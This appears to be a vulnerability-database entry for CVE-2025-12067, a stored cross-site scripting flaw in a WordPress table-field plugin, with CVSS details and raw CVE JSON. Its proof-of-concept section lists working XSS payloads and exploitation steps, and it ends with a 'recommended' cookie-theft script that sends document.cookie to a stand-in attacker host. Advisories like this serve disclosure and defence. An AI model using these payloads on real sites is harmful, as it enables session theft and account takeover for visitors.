Security Vulnerability Report
CVE-2025-12067 CVSS 6.4 MEDIUM


Published: 2026-01-06 08:15:51
Last Modified: 2026-04-15 00:35:42

Description

The Table Field Add-on for ACF and SCF plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Table Cell Content in all versions up to, and including, 1.3.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Table Field Add-on for ACF and SCF <= 1.3.30

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-12067 PoC: Stored XSS in Table Field Plugin -->
<!-- Requires WordPress account with Author-level permissions or higher -->

<!-- PoC Method 1: Using script tag -->
<script>
// Malicious JavaScript payload
// This will execute when any user views the affected page
console.log('XSS Triggered');
// Example: Steal session cookies
var stolenCookies = document.cookie;
// Example: Send stolen data to attacker-controlled server
// fetch('https://attacker.com/steal?data=' + encodeURIComponent(stolenCookies));
</script>

<!-- PoC Method 2: Using img onerror event -->
<img src=x onerror="alert('Stored XSS - CVE-2025-12067')">

<!-- PoC Method 3: Using SVG element -->
<svg/onload=alert(document.domain)>

<!-- PoC Method 4: Using body onload event -->
<body onload=alert('CVE-2025-12067 XSS')>

<!-- Exploitation Steps:
1. Authenticate to WordPress with Author+ account
2. Navigate to post/page editor
3. Add a Table Field (ACF or SCF)
4. Insert malicious payload in any table cell
5. Save/publish the content
6. Any user visiting the page will trigger the XSS
-->

<!-- Recommended Payload for Cookie Theft -->
<script>
new Image().src='https://attacker.example/log?c='+encodeURIComponent(document.cookie);
</script>

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12067",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-06T08:15:51.490",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Table Field Add-on for ACF and SCF plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Table Cell Content in all versions up to, and including, 1.3.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
      },
      {
        "lang": "es",
        "value": "El plugin Table Field Add-on for ACF and SCF para WordPress es vulnerable a cross-site scripting almacenado a través del contenido de la celda de la tabla en todas las versiones hasta la 1.3.30, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto permite a atacantes autenticados, con acceso de nivel de Autor y superior, inyectar scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3386339/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/93f80716-a95b-49fc-805f-446d4723ca77?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}